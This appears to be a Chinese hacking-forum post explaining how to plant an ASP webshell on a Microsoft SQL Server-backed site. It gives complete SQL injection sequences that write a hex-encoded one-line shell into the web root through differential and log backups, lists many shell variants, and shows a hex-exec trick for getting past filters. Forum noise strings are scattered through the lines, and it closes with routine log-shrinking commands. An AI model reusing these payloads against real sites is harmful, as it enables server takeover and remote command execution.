MSsql差异备份总结

admin

差异备份的流程大概这样：
, Q) b6 g( q+ Y4 r1.完整备份一次(保存位置当然可以改)
backup database 库名 to disk = 'c:\ddd.bak';--

2.创建表并插曲入数据
# ^0 P- B. k" T6 C0 u# Jcreate table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--

& U6 H  I1 g/ c( n9 r  O3.进行差异备份
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
- k7 A! z9 K8 V: `! }" p
! n1 q1 A. h7 p6 t( \/ Y1 @上面
0 X1 y) N( U5 U; X% O/ P0x3C25657865637574652872657175657374282261222929253E
: c; j' S2 i; j# B4 Q就是一句话木马的内容：<%execute(request("a"))%>

如下是网上常见的差异备份代码，思路一样！
  s  S/ w& }5 r) ^7 z3 q===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
# r3 C1 G+ A- ~* x6 A. d步骤:

7 {! z/ C  k( Hdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库

create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表
1 R8 x4 f1 K0 z2 p
& I5 Y# m6 Q2 r$ o% r
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中

, c% Z9 x6 s0 Y0 [3 D6 P. Sdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份
0 f! I7 ]6 Q! x# P& C  P0 D8 n6 k
( l! g  A. x' q. C/ o" ?drop table [xiaolu]  -- 删除此表。

0x77006F006B0061006F002E00620061006B00为wokao.bak
& f% z$ D2 [0 _& }, f; ?9 i% c* N0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
2 F0 P! w  I, g) l- d
& H: z0 @. X6 Q% s* ~声明：方法不是我想的，我只是写工具，默认得到shell是
  A* A1 |: L, Z, o6 N# r<%execute(request("a"))%>
===============================================================
3 c5 P8 X3 {9 p
+ I4 u5 R# x, C1 j9 s我发现上面代码，有时会无效，而直接用
9 U* {0 b2 z* n+ Z) [9 o$ y
' V5 x+ z$ }6 x7 U: c; Rbackup database 库名 to disk = 'c:\ddd.bak'
* F6 s" a! \+ W% O2 x
- c& B# ?  D6 \0 j9 Jcreate table [dbo].[dtest] ([cmd] [image]);
* H7 n1 c; J1 k
, ]! R# A) Y6 Y; E; a, l$ dinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
! C1 d4 _4 v& W3 v, @9 ^
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

9 ^$ m: d2 y6 q( G; E  O5 `却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！

3 ]  c4 m  i( U0 H* J库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！
( c# d. g9 Z5 g7 D6 @( J7 P
- y4 n% d+ \8 ?+ D9 F/ j) w& A网上还有log增量备份的，我也把他记录一下
$ A& i) l# }2 c1 U" H=====================================================
另一种log增量备份技术:
" }! z% A3 c- G: Y/ @/ v4 P
';alter database null set RECOVERY FULL--

! k) U; C' v2 X* ?3 ^+ r  ~';create table cmd (a image)--
2 [$ z) `" g  C/ l- u2 x+ p$ h4 B
' B* l. ~/ W% G- g2 U$ j: J';backup log null to disk = 'f:\cmd' with init--
# j1 X9 K4 s! x  [  l7 Y* H2 `8 ]
';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
7 q0 g& p6 t. S0 Q4 |
';backup log null to disk = '备份路径'--

/ o; j) X& ~9 L: q/ _';drop table cmd--
- L  {- h3 J* g* o! T1 x
. t- ~7 X( h" a';alter database XXX set RECOVERY SIMPLE--
8 |  D  f7 m: Y8 H, M' n( @  V4 B; v
7 Z- D6 f! s% I9 K  [5 Z5 D" nPS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话小马16进制转来的

9 }; G8 b0 h" [说到一句话马，还可以有这么几种写法：
3 @9 l) o* w  u" ]# j
% d0 S& n3 a& I. @a)<%%25Execute(request("a"))%%25>
b)<%Execute(request("a"))%>
. Z2 Y4 p9 f& Z" R6 I; V( g/ Kc)%><%execute request("a")%><%
d)<script language=VBScript runat=server>execute request("a")</script>
e)<%25Execute(request("a"))%25>
f)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
h)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
- |( a3 k2 ^+ M9 KI)<%eval request(0)%>
J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话

=============================================
& F: S5 R* l; c% C0 R4 i7 e. V
* N( g& _6 n9 [7 H当遇到差备过滤了/时用这个语句代替
, J& A" G2 G" f- V
# @7 ^2 g) R2 U+ n. V$ n- U2 p3 Adeclare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--
1 v# t7 J8 @# z9 D: x6 |* Q
. `4 A; r( |' C/ f4 t/ v, f8 K把要执行的语句转16进制然后用exec执行


: s0 U6 [. ?, q减少备份文件大小方法如下:
/ P2 p7 |8 Z" H( x4 T
总的来说就是那么简单几句,下面以备份数据库model为例子
7 a+ t/ p# G6 p" Q' G1
+ o" K, L2 t7 n5 y3 gid=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2
/ P9 X0 D& q+ Y5 |$ lid=1;backup database model to disk='你的路径‘ with differential,format;--


$ k; A3 G/ q& y
SQL语句清理日志
6 ?; T$ ]" l% ]3 j# Z1 m: ~注：test为数据库名
. d& y7 {0 e7 a  z( f4 x% }. W
; o8 f9 z# O" C( ^, N* n--清空日志
DUMP TRANSACTION test WITH NO_LOG

--截断事务日志
BACKUP LOG test WITH NO_LOG
: L8 a& n- Q0 x  o/ m! f& P* v
3 t' i0 \4 B5 l" v1 [--收缩数据库
, e: H2 T$ [, B  h% j4 ZDBCC SHRINKDATABASE(test)
  E7 i. g% h4 w- ]/ I8 j
& Y  ~) l8 @! C& h7 d' ~" e% f--收缩指定数据文件,1是文件号,可以通过这个语句查询到
Select * from sysfiles DBCC SHRINKFILE(1)
+ `3 O/ g! W; w$ b) Z
8 r5 |5 T) U* T1 Y% n/ m3 w* ^! o--以后能自动收缩
EXEC sp_dboption 'test', 'autoshrink', 'TRUE'